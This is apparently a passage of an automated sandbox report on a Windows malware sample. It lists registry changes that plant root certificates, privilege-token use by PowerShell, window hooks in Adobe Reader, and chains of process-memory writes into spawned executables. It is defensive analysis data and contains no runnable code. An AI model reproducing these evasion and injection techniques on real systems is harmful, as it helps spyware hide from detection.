Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2776 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2776 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2292 wrote to memory of 3056 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2292 wrote to memory of 3056 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2292 wrote to memory of 3056 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2292 wrote to memory of 3056 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe
PID 2288 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe
PID 2288 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe
PID 992 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 992 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 992 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2820 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe
PID 2820 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe
PID 2820 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe
PID 1772 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe
PID 2012 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe
PID 2012 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe
PID 1472 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
